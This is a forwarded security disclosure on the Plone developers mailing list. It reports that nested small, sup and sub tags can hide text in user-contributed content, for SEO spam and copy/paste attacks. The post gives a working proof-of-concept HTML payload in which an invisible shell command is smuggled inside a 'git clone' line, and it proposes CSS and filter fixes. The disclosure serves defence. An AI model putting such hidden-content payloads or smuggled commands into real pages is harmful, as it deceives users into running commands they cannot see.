Fwd: hidden web content security issue (small/sup/sub default css managment)
Matthew Wilkes <[email protected]>
| Newsgroups | gmane.comp.web.zope.plone.devel |
|---|---|
| Message-ID | <[email protected]> |
Hi all, I'm passing this on to you all as a potential bug. We on the sec team decided it'd be better handled here. I'd recommend avoiding fiddling with safe_html if you value your sanity, though. Matt -------- Original Message -------- Delivered-To: [email protected] Received: by 10.182.246.227 with SMTP id xz3csp47904obc; Sat, 18 Jan 2014 16:45:32 -0800 (PST) X-Received: by 10.15.82.67 with SMTP id z43mr10211032eey.60.1390092332039; Sat, 18 Jan 2014 16:45:32 -0800 (PST) Return-Path: <[email protected]> Received: from mail-ea0-f197.google.com (mail-ea0-f197.google.com [209.85.215.197]) by mx.google.com with ESMTPS id d46si15744915eeo.249.2014.01.18.16.45.31 for <[email protected]> (version=TLSv1 cipher=ECDHE-RSA-RC4-SHA bits=128/128); Sat, 18 Jan 2014 16:45:32 -0800 (PST) Received-SPF: softfail (google.com: domain of transitioning [email protected] does not designate 88.190.208.98 as permitted sender) client-ip=88.190.208.98; Authentication-Results: mx.google.com; spf=softfail (google.com: domain of transitioning [email protected] does not designate 88.190.208.98 as permitted sender) [email protected] Received: by mail-ea0-f197.google.com with SMTP id b10sf8549418eae.8 for <[email protected]>; Sat, 18 Jan 2014 16:45:31 -0800 (PST) X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:message-id:date:from:user-agent:mime-version:to :subject:dkim-filter:dkim-filter:x-original-sender :x-original-authentication-results:precedence:mailing-list:list-id :list-help:content-type:content-transfer-encoding; bh=7F3swCoM2cY/3GzlZtO+BDUDPSm53NwjCoVMmYYH1iE=; b=BCGheWpfy0aTO37wreN+kcv0jE935vhCAEXZKEZfOTB7vtm3BcLEnTsHjKTbxYsNlX YEu/gAfMipozHfpN96OUY6hRlLZFpmuxcLJmM/wrsAZ5CdJx3LDDKI7k0dN14Xs+hB+K oBCxakI9YW8IhDCSycNvO4/ViyCJm7InBHzQUa9k0Q2hTZjtKM9drMcKI5EXWseHOLfs 45hciDkLy8FPsja0eQ/Zh6F6psubjewJ8rhUO8lXvU9BLHZxb4a7ZlSlvTHqaeTH+pHII7aEE 6nK2edPG57KJjF7lgbhtUvGzF1UsZxiUMwu2zztQYpTOHAjh2sWLTeL7Mg54Oi/u21x9 2+Sg== X-Gm-Message-State: ALoCoQlcF/VTp8f5AqTXJyab4FqV1tg3KJJvxI2WDEhOkTlRZ+8uJ51xt4HlJfz8XO0FDxaP8Ese X-Received: by 10.180.19.66 with SMTP id c2mr2974736wie.7.1390092331334; Sat, 18 Jan 2014 16:45:31 -0800 (PST) X-BeenThere: [email protected] Received: by 10.180.75.206 with SMTP id e14ls44799wiw.18.canary; Sat, 18 Jan 2014 16:45:31 -0800 (PST) X-Received: by 10.194.82.105 with SMTP id h9mr279357wjy.52.1390092331053; Sat, 18 Jan 2014 16:45:31 -0800 (PST) Received: from mxrelay.makina-corpus.com (mxrelay.makina-corpus.com. [88.190.208.98]) by mx.google.com with ESMTP id gj10si2120247wib.86.2014.01.18.16.45.30 for <[email protected]>; Sat, 18 Jan 2014 16:45:30 -0800 (PST) Received-SPF: pass (google.com: domain of [email protected] designates 88.190.208.98 as permitted sender) client-ip=88.190.208.98; Received: from localhost (localhost.localdomain [127.0.0.1]) by mxrelay.makina-corpus.com (Postfix) with ESMTP id 8B07E80CCD for <[email protected]>; Sun, 19 Jan 2014 01:45:00 +0100 (CET) X-Virus-Scanned: amavisd-new at makina-corpus.com Received: from mxrelay.makina-corpus.com ([127.0.0.1]) by localhost (mxrelay.makina-corpus.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id lC5bWZWwNf-x for <[email protected]>; Sun, 19 Jan 2014 01:44:59 +0100 (CET) Received: from mail.makina-corpus.com (mail.makina-corpus.com [212.83.188.243]) by mxrelay.makina-corpus.com (Postfix) with ESMTP id 6A22180CCC for <[email protected]>; Sun, 19 Jan 2014 01:44:59 +0100 (CET) Received: from [192.168.1.52] (ANantes-656-1-6-186.w2-9.abo.wanadoo.fr [2.9.21.186]) (Authenticated sender: [email protected]) by mail.makina-corpus.com (Postfix) with ESMTPSA id 4025920BD9 for <[email protected]>; Sun, 19 Jan 2014 01:44:59 +0100 (CET) Message-ID: <[email protected]> Date: Sun, 19 Jan 2014 01:45:30 +0100 From: Régis Leroy <[email protected]> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20131103 Icedove/17.0.10 MIME-Version: 1.0 To: [email protected] Subject: hidden web content security issue (small/sup/sub default css managment) X-Enigmail-Version: 1.5.1 DKIM-Filter: OpenDKIM Filter v2.8.4 mxrelay.makina-corpus.com 6A22180CCC DKIM-Filter: OpenDKIM Filter v2.8.4 mxrelay.makina-corpus.com 8B07E80CCD X-Original-Sender: [email protected] X-Original-Authentication-Results: mx.google.com; spf=pass (google.com: domain of [email protected] designates 88.190.208.98 as permitted sender) [email protected] Precedence: list Mailing-list: list [email protected]; contact [email protected] List-ID: <security.plone.org> X-Google-Group-Id: 100390162868 List-Help: <http://support.google.com/a/plone.org/bin/topic.py&topic=25838>, <mailto:[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello, Summary: ======= small, sup and sub tags are allowed in most default contributors filters (safe HTML and Kupu -- but Kupu removes small). The default plone css does not add any instructions and the default browser "font-size: smaller" is used. This could be used to hide some content with font-size: 0px using several encapsulated small,sup or sub tags. This makes any plone website allowing external contributions usable for hidden content attacks. Security level of this issue is not very high, but that's still a security issue and some plone users may get more trouble with this than others. Exploitation: =============== Hidden content could be used in several ways: * SEO : comments on well referenced pages linking to evil websites * copy/paste attacks: make the user copy an harmless command in a terminal,then use it to do evil things on his name ( downloading rootkits, copying ssh keys, introducing xss vectors on other website, etc). Refer to http://www.ush.it/team/ascii/hack-tricks_253C_CCC2008/wysinwyc/what_you_see_is_not_what_you_copy.txt for details. Method: ======== Encapsulate content in a lot of small,sup or sub HTML markup. Example: ====== I've used http://plonedemo.com and added this example: """ <p><small>small</small>test <small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><sma l l><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small>smaller text, but it's quite a very long one, so it should still be visible to avoid any security problem</small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small > </small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small> with hidden sentence.</p> <p>This is a security test:<br /> please do not copy/paste git clone <sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup>/dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThis is an hidden content.'git clone</sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup> https://github.com/github/developer.github.com.git <sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub> help; This is a second hidden content for SEO https://help.github.com/ </sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub> help</p> <p>This is the end.</p> """ Impact ====== * Chrome 31.0.1650.63 is completly hiding the content. * Firefox 17.0.10 show 1px garbage content (good point) Impact of the attack is mitigated by the fact no { font-size: 80% } is defined in the default css, so the browser defaults are used ( { font-size: smaller } ). But for any derivated theme which would use this trick (font reduction with percentage) even firtefox would completly hide the content. This is something used on a lot of derivated themes, especially when people add a reste.css which usually contains a default font-size: 100% for small sub and sup. The { font-size: smaller } is a little harder to hack. I did not test IE or other browsers. Fix === One working css fix is: sup sup, sub sub { font-size: 100%; position: relative; top: 0; bottom: 0 } This could be added on the default Plone theme. Another fix could be removing support for small, sub and sup tags (or move them in the removed tags where content is not removed for Safe HTML filter) support, or an deep-encapsulation detection (but html parsers are hard to code, they need to support all the formatting errors that browsers could allow) ------------------------------------------------------------------------------ CenturyLink Cloud: The Leader in Enterprise Cloud Services. Learn Why More Businesses Are Choosing CenturyLink Cloud For Critical Workloads, Development Environments & Everything In Between. Get a Quote or Start a Free Trial Today. http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk _______________________________________________ Plone-developers mailing list [email protected] https://lists.sourceforge.net/lists/listinfo/plone-developers